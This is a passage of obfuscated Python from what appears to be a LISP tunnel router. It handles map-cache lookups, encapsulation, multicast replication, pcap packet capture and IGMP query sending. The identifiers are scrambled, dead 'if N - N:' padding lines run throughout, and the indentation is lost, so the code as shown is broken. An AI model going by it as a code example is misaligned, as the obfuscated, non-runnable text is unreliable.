oO00oo0o00o0o , IiIIIIIi , iiIii1IIi = lisp . lisp_allow_gleaning ( iI11I . inner_source , O0O0OOOOoo , None )
else :
OOo0 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( O0O0OOOOoo , None , None )
if 10 - 10: i11iIiiIii - o0oOOo0O0Ooo % iIii1I11I1II1
iI11I . gleaned_dest = OOo0
if 49 - 49: oO0o
if 83 - 83: oO0o % Oo0Ooo - o0oOOo0O0Ooo . iII111i / Oo0Ooo % I1ii11iIi11i
if 75 - 75: O0 % OoOoOO00 . IiII / IiII / OoO0O00
if 19 - 19: I1ii11iIi11i % i11iIiiIii . OOooOOo - Oo0Ooo / OoooooooOO
o00oo0 = lisp . lisp_map_cache_lookup ( iI11I . inner_source , iI11I . inner_dest )
if ( o00oo0 ) : o00oo0 . add_recent_source ( iI11I . inner_source )
if 66 - 66: OoO0O00 * Oo0Ooo
if 28 - 28: OoO0O00 % OoOoOO00 % I1ii11iIi11i + I1IiiI / I1IiiI
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if 23 - 23: i11iIiiIii
if ( o00oo0 and ( o00oo0 . action == lisp . LISP_NATIVE_FORWARD_ACTION or
o00oo0 . eid . address == 0 ) ) :
II1I11IIi = lisp . lisp_db_for_lookups . lookup_cache ( iI11I . inner_source , False )
if ( II1I11IIi and II1I11IIi . secondary_iid ) :
OoOOo = iI11I . inner_dest
OoOOo . instance_id = II1I11IIi . secondary_iid
if 17 - 17: i1IIi
o00oo0 = lisp . lisp_map_cache_lookup ( iI11I . inner_source , OoOOo )
if ( o00oo0 ) :
iI11I . gleaned_dest = o00oo0 . gleaned
o00oo0 . add_recent_source ( iI11I . inner_source )
else :
OOo0 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( OoOOo , None ,
None )
iI11I . gleaned_dest = OOo0
if 1 - 1: ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
if 46 - 46: i11iIiiIii - O0 . oO0o
if 100 - 100: I1IiiI / o0oOOo0O0Ooo * iII111i . O0 / OOooOOo
if 83 - 83: I1Ii111
if ( o00oo0 == None and OOo0 ) :
lisp . lprint ( "Suppress Map-Request for gleaned EID {}" . format ( lisp . green ( iI11I . inner_dest . print_address ( ) , False ) ) )
if 48 - 48: II111iiii * OOooOOo * I1Ii111
return
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if ( o00oo0 == None or lisp . lisp_mr_or_pubsub ( o00oo0 . action ) ) :
if ( lisp . lisp_rate_limit_map_request ( iI11I . inner_dest ) ) : return
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
O00ooOo = ( o00oo0 and o00oo0 . action == lisp . LISP_SEND_PUBSUB_ACTION )
lisp . lisp_send_map_request ( Oo0o , Ooo ,
iI11I . inner_source , iI11I . inner_dest , None , O00ooOo )
if 80 - 80: o0oOOo0O0Ooo - OOooOOo + OoooooooOO
if ( iI11I . is_trace ( ) ) :
O0Oo00oO0O00 = OOO0o0o
O0ooOoO = "map-cache miss"
lisp . lisp_trace_append ( iI11I , reason = O0ooOoO , lisp_socket = O0Oo00oO0O00 )
if 26 - 26: OoOoOO00 / Oo0Ooo - i1IIi + I11i
return
if 38 - 38: OoooooooOO / I1ii11iIi11i . O0 / i1IIi / Oo0Ooo + iIii1I11I1II1
if 96 - 96: iII111i
if 18 - 18: iII111i * I11i - Ii1I
if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if ( o00oo0 and o00oo0 . refresh ( ) ) :
if ( lisp . lisp_rate_limit_map_request ( iI11I . inner_dest ) == False ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( o00oo0 . print_eid_tuple ( ) , False ) ) )
if 39 - 39: iIii1I11I1II1 - OoooooooOO
lisp . lisp_send_map_request ( Oo0o , Ooo ,
iI11I . inner_source , iI11I . inner_dest , None )
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
if 28 - 28: Oo0Ooo * ooOoO0o - OoO0O00
if 19 - 19: I11i
if 67 - 67: O0 % iIii1I11I1II1 / IiII . i11iIiiIii - Ii1I + O0
if 27 - 27: OOooOOo
if 89 - 89: II111iiii / oO0o
o00oo0 . last_refresh_time = time . time ( )
o00oo0 . stats . increment ( len ( iI11I . packet ) )
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
IIiIi1 , Oo00O0ooOO , IiiI , i11ii , i11I1 , i1I1iI1iIi111i = o00oo0 . select_rloc ( iI11I , None )
if 34 - 34: O0 * O0 % OoooooooOO + iII111i * iIii1I11I1II1 % Ii1I
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if ( IIiIi1 == None and i11I1 == None ) :
if ( i11ii == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
iI11I . send_packet ( o0oOoO00o , iI11I . inner_dest )
if 32 - 32: i11iIiiIii - I1Ii111
if ( iI11I . is_trace ( ) ) :
O0Oo00oO0O00 = OOO0o0o
O0ooOoO = "not an EID"
lisp . lisp_trace_append ( iI11I , reason = O0ooOoO , lisp_socket = O0Oo00oO0O00 )
if 53 - 53: OoooooooOO - IiII
OO0000o ( Iii1iiIi1II , "RTR" )
return
if 87 - 87: oO0o . I1IiiI
O0ooOoO = "No reachable RLOCs found"
lisp . dprint ( O0ooOoO )
if 17 - 17: Ii1I . i11iIiiIii
if ( iI11I . is_trace ( ) ) :
O0Oo00oO0O00 = OOO0o0o
lisp . lisp_trace_append ( iI11I , reason = O0ooOoO , lisp_socket = O0Oo00oO0O00 )
if 5 - 5: I1ii11iIi11i + O0 + O0 . I1Ii111 - ooOoO0o
return
if 63 - 63: oO0o
if ( IIiIi1 and IIiIi1 . is_null ( ) ) :
lisp . dprint ( "Drop action RLOC found" )
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if ( iI11I . is_trace ( ) ) :
O0Oo00oO0O00 = OOO0o0o
O0ooOoO = "drop action"
lisp . lisp_trace_append ( iI11I , reason = O0ooOoO , lisp_socket = O0Oo00oO0O00 )
if 36 - 36: IiII
return
if 49 - 49: OOooOOo / OoooooooOO / I1IiiI
if 74 - 74: I1Ii111 % I1ii11iIi11i
if 7 - 7: II111iiii
if 27 - 27: oO0o . OoooooooOO + i11iIiiIii
if 86 - 86: I11i / o0oOOo0O0Ooo - o0oOOo0O0Ooo + I1ii11iIi11i + oO0o
iI11I . outer_tos = iI11I . inner_tos
iI11I . outer_ttl = iI11I . inner_ttl
if 33 - 33: o0oOOo0O0Ooo . iII111i . IiII . i1IIi
if 49 - 49: I1ii11iIi11i
if 84 - 84: I11i - Oo0Ooo / O0 - I1Ii111
if 21 - 21: O0 * O0 % I1ii11iIi11i
if ( IIiIi1 ) :
iI11I . encap_port = Oo00O0ooOO
if ( Oo00O0ooOO == 0 ) : iI11I . encap_port = lisp . LISP_DATA_PORT
iI11I . outer_dest . copy_address ( IIiIi1 )
o00ooo = iI11I . outer_dest . afi_to_version ( )
iI11I . outer_version = o00ooo
if 31 - 31: O0 * o0oOOo0O0Ooo % o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
III1ii = iIiiI1 if ( o00ooo == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 41 - 41: ooOoO0o . Oo0Ooo + I1IiiI
iI11I . outer_source . copy_address ( III1ii )
if 100 - 100: Ii1I + OoO0O00
if ( iI11I . is_trace ( ) ) :
O0Oo00oO0O00 = OOO0o0o
if ( lisp . lisp_trace_append ( iI11I , rloc_entry = i1I1iI1iIi111i ,
lisp_socket = O0Oo00oO0O00 ) == False ) : return
if 73 - 73: i1IIi - I1Ii111 % ooOoO0o / OoO0O00
if 40 - 40: I1ii11iIi11i * ooOoO0o - I1IiiI / IiII / i11iIiiIii
if 83 - 83: I1ii11iIi11i / I1Ii111 - i11iIiiIii . iIii1I11I1II1 + Oo0Ooo
if 59 - 59: O0 % Oo0Ooo
if 92 - 92: Ii1I % iII111i / I1ii11iIi11i % I1ii11iIi11i * I1IiiI
if ( iI11I . encode ( IiiI ) == None ) : return
if ( len ( iI11I . packet ) <= 1500 ) : iI11I . print_packet ( "Send" , True )
if 74 - 74: O0 . I1IiiI % OoO0O00 % IiII
if 87 - 87: oO0o - i11iIiiIii
if 78 - 78: i11iIiiIii / iIii1I11I1II1 - o0oOOo0O0Ooo
if 23 - 23: I11i
iIiiIiiIi = i1 if o00ooo == 6 else o0oOoO00o
iI11I . send_packet ( iIiiIiiIi , iI11I . outer_dest )
if 40 - 40: o0oOOo0O0Ooo
elif ( i11I1 ) :
if 78 - 78: iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
I11i1iIiiIiIi = len ( iI11I . packet )
for I1i in i11I1 . rle_forwarding_list :
iI11I . outer_dest . copy_address ( I1i . address )
iI11I . encap_port = lisp . LISP_DATA_PORT if I1i . translated_port == 0 else I1i . translated_port
if 59 - 59: OoooooooOO . Ii1I / O0 - OOooOOo
if 1 - 1: IiII / IiII - i11iIiiIii
o00ooo = iI11I . outer_dest . afi_to_version ( )
iI11I . outer_version = o00ooo
if 87 - 87: Oo0Ooo / O0 * IiII / o0oOOo0O0Ooo
III1ii = iIiiI1 if ( o00ooo == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 19 - 19: I1Ii111 + i1IIi . I1IiiI - Oo0Ooo
iI11I . outer_source . copy_address ( III1ii )
if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
if ( iI11I . is_trace ( ) ) :
O0Oo00oO0O00 = OOO0o0o
O0ooOoO = "replicate"
if ( lisp . lisp_trace_append ( iI11I , reason = O0ooOoO , lisp_socket = O0Oo00oO0O00 ) == False ) : return
if 82 - 82: IiII * i11iIiiIii % II111iiii - OoooooooOO
if 90 - 90: Oo0Ooo . oO0o * i1IIi - i1IIi
if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
if ( iI11I . encode ( None ) == None ) : return
if 14 - 14: iIii1I11I1II1 * I1Ii111 * I1ii11iIi11i / iIii1I11I1II1 * IiII / I11i
iI11I . print_packet ( "Replicate-to-L{}" . format ( I1i . level ) , True )
iI11I . send_packet ( o0oOoO00o , iI11I . outer_dest )
if 77 - 77: OoO0O00 + I1Ii111 + I1Ii111 * Ii1I / OoooooooOO . Ii1I
if 62 - 62: i1IIi - i1IIi
if 69 - 69: OoOoOO00 % oO0o - I11i
if 38 - 38: iIii1I11I1II1 + i11iIiiIii / i11iIiiIii % OoO0O00 / ooOoO0o % Ii1I
if 7 - 7: IiII * I1IiiI + i1IIi + i11iIiiIii + Oo0Ooo % I1IiiI
OO00OO0o0 = len ( iI11I . packet ) - I11i1iIiiIiIi
iI11I . packet = iI11I . packet [ OO00OO0o0 : : ]
if 52 - 52: I1ii11iIi11i % oO0o - i11iIiiIii
if ( lisp . lisp_flow_logging ) : iI11I = copy . deepcopy ( iI11I )
if 30 - 30: iII111i / OoO0O00 + oO0o
if 6 - 6: iII111i . I11i + Ii1I . I1Ii111
if 70 - 70: OoO0O00
if 46 - 46: I11i - i1IIi
if 46 - 46: I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
del ( iI11I )
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
OO0000o ( Iii1iiIi1II , "RTR" )
return
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
def I1I1iII1i ( lisp_thread ) :
lisp . lisp_set_exception ( )
while ( True ) :
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
iI11I = lisp_thread . input_queue . get ( )
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
lisp_thread . input_stats . increment ( len ( iI11I ) )
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
lisp_thread . lisp_packet . packet = iI11I
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
ooO0o ( lisp_thread . lisp_packet , lisp_thread . thread_name )
if 66 - 66: I1IiiI - IiII
return
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
def o00Ooo0 ( thread ) :
O0O00O = ( time . time ( ) % thread . number_of_pcap_threads )
return ( int ( O0O00O ) == thread . thread_number )
if 4 - 4: OoOoOO00 + Ii1I / oO0o
if 13 - 13: iII111i
if 80 - 80: Ii1I - o0oOOo0O0Ooo
if 41 - 41: o0oOOo0O0Ooo - Oo0Ooo * I1IiiI
if 82 - 82: OoO0O00 % o0oOOo0O0Ooo % OOooOOo / O0
if 94 - 94: I1ii11iIi11i + I1ii11iIi11i + OoooooooOO % ooOoO0o
if 7 - 7: iII111i
if 78 - 78: OOooOOo + iII111i . IiII
def OoIIi1iI ( parms , not_used , packet ) :
if ( o00Ooo0 ( parms [ 1 ] ) == False ) : return
if 92 - 92: OoO0O00 * ooOoO0o
i1iIIi1 = parms [ 0 ]
o0o0OoOOOOOo = parms [ 1 ]
Ii11iii1II1i = o0o0OoOOOOOo . number_of_worker_threads
if 65 - 65: Ii1I + OoO0O00 - OoooooooOO
o0o0OoOOOOOo . input_stats . increment ( len ( packet ) )
if 51 - 51: Oo0Ooo + oO0o / iII111i - i1IIi
if 51 - 51: Oo0Ooo - I1ii11iIi11i * I11i
if 12 - 12: iIii1I11I1II1 % ooOoO0o % ooOoO0o
if 78 - 78: IiII . OoOoOO00 . I11i
if 97 - 97: oO0o
if 80 - 80: I1IiiI . Ii1I
I1I11ii = 4 if i1iIIi1 == "lo0" else ( 14 if lisp . lisp_is_macos ( ) else 16 )
packet = packet [ I1I11ii : : ]
if 93 - 93: I1ii11iIi11i % OoOoOO00 . O0 / iII111i * oO0o
if 29 - 29: o0oOOo0O0Ooo
if 86 - 86: II111iiii . IiII
if 2 - 2: OoooooooOO
if ( Ii11iii1II1i ) :
o0o0O00 = o0o0OoOOOOOo . input_stats . packet_count % Ii11iii1II1i
o0o0O00 = o0o0O00 + ( len ( O0ooo00OOo00 ) - Ii11iii1II1i )
i1i = O0ooo00OOo00 [ o0o0O00 ]
i1i . input_queue . put ( packet )
else :
o0o0OoOOOOOo . lisp_packet . packet = packet
ooO0o ( o0o0OoOOOOOo . lisp_packet , o0o0OoOOOOOo . thread_name )
if 50 - 50: i1IIi % oO0o + I11i / oO0o + iIii1I11I1II1 % OoooooooOO
return
if 40 - 40: Ii1I % o0oOOo0O0Ooo
if 38 - 38: iIii1I11I1II1 + i11iIiiIii * OoO0O00 * ooOoO0o % OOooOOo
if 5 - 5: ooOoO0o - I1Ii111 + I1IiiI * O0 / Oo0Ooo - Ii1I
if 75 - 75: OoooooooOO - OOooOOo + o0oOOo0O0Ooo / iII111i % i11iIiiIii
if 10 - 10: OoO0O00
if 22 - 22: i11iIiiIii / O0
if 94 - 94: ooOoO0o * I11i - IiII . iIii1I11I1II1
if 66 - 66: ooOoO0o - OOooOOo * OoOoOO00 / oO0o * II111iiii * OoO0O00
def Ooo0O ( lisp_thread ) :
lisp . lisp_set_exception ( )
if ( lisp . lisp_myrlocs [ 0 ] == None ) : return
if 34 - 34: ooOoO0o
i1iIIi1 = "lo0" if lisp . lisp_is_macos ( ) else "any"
if 27 - 27: I1Ii111 + OoooooooOO - OoOoOO00
if 15 - 15: oO0o / I11i * O0 . II111iiii - OoO0O00
if 90 - 90: oO0o
if 94 - 94: I11i / I1ii11iIi11i * I1Ii111 - OoOoOO00
if 44 - 44: Ii1I % i11iIiiIii - iII111i * I1ii11iIi11i + Oo0Ooo * OOooOOo
IiI1iI1IiiIi1 = getoutput ( "egrep 'lisp-nat = yes' ./lisp.config" )
IiI1iI1IiiIi1 = ( IiI1iI1IiiIi1 != "" and IiI1iI1IiiIi1 [ 0 ] == " " )
if 90 - 90: O0 + I11i - OoooooooOO . I11i
oOII1ii1ii11I1 = "(dst host "
o0ooOO0o = ""
for iI1Iii in lisp . lisp_get_all_addresses ( ) :
oOII1ii1ii11I1 += "{} or " . format ( iI1Iii )
o0ooOO0o += "{} or " . format ( iI1Iii )
if 71 - 71: OoooooooOO
oOII1ii1ii11I1 = oOII1ii1ii11I1 [ 0 : - 4 ]
oOII1ii1ii11I1 += ") and ((udp dst port 4341 or 8472 or 4789) or "
oOII1ii1ii11I1 += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0))))"
if 5 - 5: OoOoOO00 % OoooooooOO
if 60 - 60: OoOoOO00 . i1IIi % OoO0O00 % ooOoO0o % OOooOOo
if 33 - 33: iIii1I11I1II1 - Ii1I * I1ii11iIi11i % iIii1I11I1II1 + OoO0O00 . OOooOOo
if 56 - 56: i11iIiiIii * iII111i . oO0o
if 78 - 78: OoOoOO00
if 1 - 1: OOooOOo . IiII
o0ooOO0o = o0ooOO0o [ 0 : - 4 ]
oOII1ii1ii11I1 += ( " or (not (src host {}) and " + "((udp src port 4342 and ip[28] == 0x28) or " + "(udp dst port 4342 and ip[28] == 0x12)))" ) . format ( o0ooOO0o )
if 42 - 42: OOooOOo % oO0o / OoO0O00 - oO0o * i11iIiiIii
if 19 - 19: oO0o * I1IiiI % i11iIiiIii
if 24 - 24: o0oOOo0O0Ooo
if ( IiI1iI1IiiIi1 ) :
oOII1ii1ii11I1 += ( " or (dst net 0.0.0.0/0 and " + "not (host {} or src net 127.0.0.0/8))" ) . format ( o0ooOO0o )
if 10 - 10: o0oOOo0O0Ooo % Ii1I / OOooOOo
if 28 - 28: OOooOOo % ooOoO0o
if 48 - 48: i11iIiiIii % oO0o
lisp . lprint ( "Capturing packets for: '{}'" . format ( oOII1ii1ii11I1 ) )
if 29 - 29: iII111i + i11iIiiIii % I11i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if ( lisp . lisp_is_python2 ( ) ) :
oo0O0o = pcappy . open_live ( i1iIIi1 , 9000 , 0 , 100 )
oo0O0o . filter = oOII1ii1ii11I1
oo0O0o . loop ( - 1 , OoIIi1iI , [ i1iIIi1 , lisp_thread ] )
if 13 - 13: iIii1I11I1II1 . OoOoOO00 * I1IiiI / oO0o * Ii1I
if ( lisp . lisp_is_python3 ( ) ) :
oo0O0o = pcapy . open_live ( i1iIIi1 , 9000 , 0 , 100 )
oo0O0o . setfilter ( oOII1ii1ii11I1 )
while ( True ) :
O0OO0oOOo , iI11I = oo0O0o . next ( )
OoIIi1iI ( [ i1iIIi1 , lisp_thread ] , None , iI11I )
if 64 - 64: ooOoO0o / O0 * OoOoOO00 * ooOoO0o
if 60 - 60: I11i / i1IIi % I1ii11iIi11i / I1ii11iIi11i * I1ii11iIi11i . i11iIiiIii
return
if 99 - 99: OoOoOO00
if 77 - 77: o0oOOo0O0Ooo
if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
if 65 - 65: OoOoOO00
if 31 - 31: I11i * OoOoOO00 . IiII % Ii1I + Oo0Ooo
if 47 - 47: O0 * I1IiiI * OoO0O00 . II111iiii
if 95 - 95: Ii1I % IiII . O0 % I1Ii111
if 68 - 68: Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . ooOoO0o / i1IIi
def iI1i1iIi1iiII ( lisp_raw_socket , eid , geid , igmp ) :
if 53 - 53: I11i
if 68 - 68: oO0o / I1Ii111 % I1Ii111 % O0
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
iI11I = lisp . lisp_packet ( igmp )
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
if 79 - 79: OoOoOO00 / ooOoO0o
if 77 - 77: Oo0Ooo
o00oo0 = lisp . lisp_map_cache_lookup ( eid , geid )
if ( o00oo0 == None ) : return
if ( o00oo0 . rloc_set == [ ] ) : return
if ( o00oo0 . rloc_set [ 0 ] . rle == None ) : return
if 46 - 46: I1Ii111
o00OoooooooOo = eid . print_address_no_iid ( )
for iiIi1IIi1I in o00oo0 . rloc_set [ 0 ] . rle . rle_nodes :
if ( iiIi1IIi1I . rloc_name == o00OoooooooOo ) :
iI11I . outer_dest . copy_address ( iiIi1IIi1I . address )
iI11I . encap_port = iiIi1IIi1I . translated_port
break
if 32 - 32: o0oOOo0O0Ooo + I1IiiI . I1Ii111
if 41 - 41: OoOoOO00 . i11iIiiIii / I11i
if ( iI11I . outer_dest . is_null ( ) ) : return
if 98 - 98: OoOoOO00 % II111iiii
iI11I . outer_source . copy_address ( lisp . lisp_myrlocs [ 0 ] )
iI11I . outer_version = iI11I . outer_dest . afi_to_version ( )
iI11I . outer_ttl = 32
iI11I . inner_source . copy_address ( lisp . lisp_myrlocs [ 0 ] )
iI11I . inner_dest . store_address ( "[{}]224.0.0.1" . format ( geid . instance_id ) )
iI11I . inner_ttl = 1
if 95 - 95: iIii1I11I1II1 - I1Ii111 - OOooOOo + I1Ii111 % I1ii11iIi11i . I1IiiI
o000O0o = lisp . green ( eid . print_address ( ) , False )
O0ooOoO = lisp . red ( "{}:{}" . format ( iI11I . outer_dest . print_address_no_iid ( ) ,
iI11I . encap_port ) , False )
IiiIIi1 = lisp . bold ( "IGMP Query" , False )
if 28 - 28: o0oOOo0O0Ooo
lisp . lprint ( "Data encapsulate {} to gleaned EID {}, RLOC {}" . format ( IiiIIi1 , o000O0o , O0ooOoO ) )
if 45 - 45: o0oOOo0O0Ooo . I1IiiI / I1Ii111 - Oo0Ooo * iIii1I11I1II1
if 86 - 86: II111iiii + ooOoO0o + IiII
if 9 - 9: ooOoO0o + II111iiii % ooOoO0o % IiII + iIii1I11I1II1
if 59 - 59: i1IIi
if 48 - 48: O0 * Ii1I * OoO0O00 . OoO0O00 * I11i - Ii1I
if ( iI11I . encode ( None ) == None ) : return
iI11I . print_packet ( "Send" , True )
if 14 - 14: I1ii11iIi11i + i11iIiiIii
iI11I . send_packet ( lisp_raw_socket , iI11I . outer_dest )
if 83 - 83: I1ii11iIi11i / i11iIiiIii + II111iiii . iII111i * OOooOOo + IiII
if 42 - 42: i1IIi % II111iiii . ooOoO0o
if 7 - 7: I1ii11iIi11i - oO0o * OOooOOo + o0oOOo0O0Ooo . I1ii11iIi11i
if 85 - 85: O0
if 32 - 32: OoooooooOO . OoO0O00 / Oo0Ooo * o0oOOo0O0Ooo / o0oOOo0O0Ooo * Ii1I
if 19 - 19: Ii1I
if 55 - 55: OOooOOo % OOooOOo / O0 % iII111i - o0oOOo0O0Ooo . Oo0Ooo
if 49 - 49: iIii1I11I1II1 * i1IIi . OoooooooOO
if 90 - 90: o0oOOo0O0Ooo % I1ii11iIi11i - iIii1I11I1II1 % OoOoOO00
if 8 - 8: OoOoOO00 * Oo0Ooo / IiII % Ii1I - I1IiiI
if 71 - 71: iII111i
if 23 - 23: i1IIi . iIii1I11I1II1 . OOooOOo . O0 % Ii1I % i11iIiiIii
if 11 - 11: O0 - II111iiii . OOooOOo . Ii1I % I1Ii111
if 21 - 21: Oo0Ooo / iII111i . I1Ii111 * OoooooooOO + I11i - i1IIi
if 58 - 58: I1ii11iIi11i
if 2 - 2: II111iiii / I1Ii111
if 54 - 54: i1IIi . I11i - I1ii11iIi11i + ooOoO0o + Oo0Ooo / Oo0Ooo
if 22 - 22: ooOoO0o . iIii1I11I1II1
if 12 - 12: Ii1I
if 71 - 71: I1IiiI . II111iiii . I1IiiI - ooOoO0o
if 45 - 45: IiII / O0 / OoOoOO00 * OOooOOo
if 18 - 18: iIii1I11I1II1 + OOooOOo + iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
def Iii ( lisp_raw_socket ) :
if ( lisp . lisp_gleaned_groups == { } ) : return
if 7 - 7: Oo0Ooo * OoooooooOO % O0 - Ii1I . Ii1I
if 80 - 80: OoOoOO00 - II111iiii
if 35 - 35: ooOoO0o - OoO0O00 . Oo0Ooo * Oo0Ooo / i11iIiiIii + I1ii11iIi11i
if 87 - 87: OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
III1II1i = b"\x46\xc0\x00\x24\x00\x00\x40\x00\x01\x02\x00\x00"
iI1i1IiIIIIi = lisp . lisp_myrlocs [ 0 ]
Oo0OoO00oOO0o = iI1i1IiIIIIi . address
III1II1i += bytes ( [ ( Oo0OoO00oOO0o >> 24 ) & 0xff , ( Oo0OoO00oOO0o >> 16 ) & 0xff , ( Oo0OoO00oOO0o >> 8 ) & 0xff ,
Oo0OoO00oOO0o & 0xff ] )
III1II1i += b"\xe0\x00\x00\x01"
III1II1i += b"\x94\x04\x00\x00"
III1II1i = lisp . lisp_ip_checksum ( III1II1i , 24 )
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
o000OOooo0O = b"\x11\x64\x00\x00" + b"\x00\x00\x00\x00" + b"\x02\x3c\x00\x00"
o000OOooo0O = lisp . lisp_igmp_checksum ( o000OOooo0O )
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
if 84 - 84: i1IIi
o00oO0oo0OO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
i1OOO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 42 - 42: II111iiii - OoO0O00 - OoooooooOO . iII111i / OoOoOO00
for Ii1iIiII1ii1 in lisp . lisp_gleaned_groups :
o00oO0oo0OO . store_address ( Ii1iIiII1ii1 )
for ooooo0Oo0 in lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] :
i1OOO . store_address ( ooooo0Oo0 )
oO00oo0o00o0o , IiIIIIIi , o0 = lisp . lisp_allow_gleaning ( o00oO0oo0OO , i1OOO , None )
if ( o0 == False ) : continue
iI1i1iIi1iiII ( lisp_raw_socket , o00oO0oo0OO , i1OOO , III1II1i + o000OOooo0O )
if 9 - 9: I1Ii111 * Oo0Ooo + O0 - I1Ii111
if 73 - 73: iIii1I11I1II1
if 74 - 74: iII111i - I1Ii111 * IiII / iIii1I11I1II1 / I1IiiI % I1ii11iIi11i
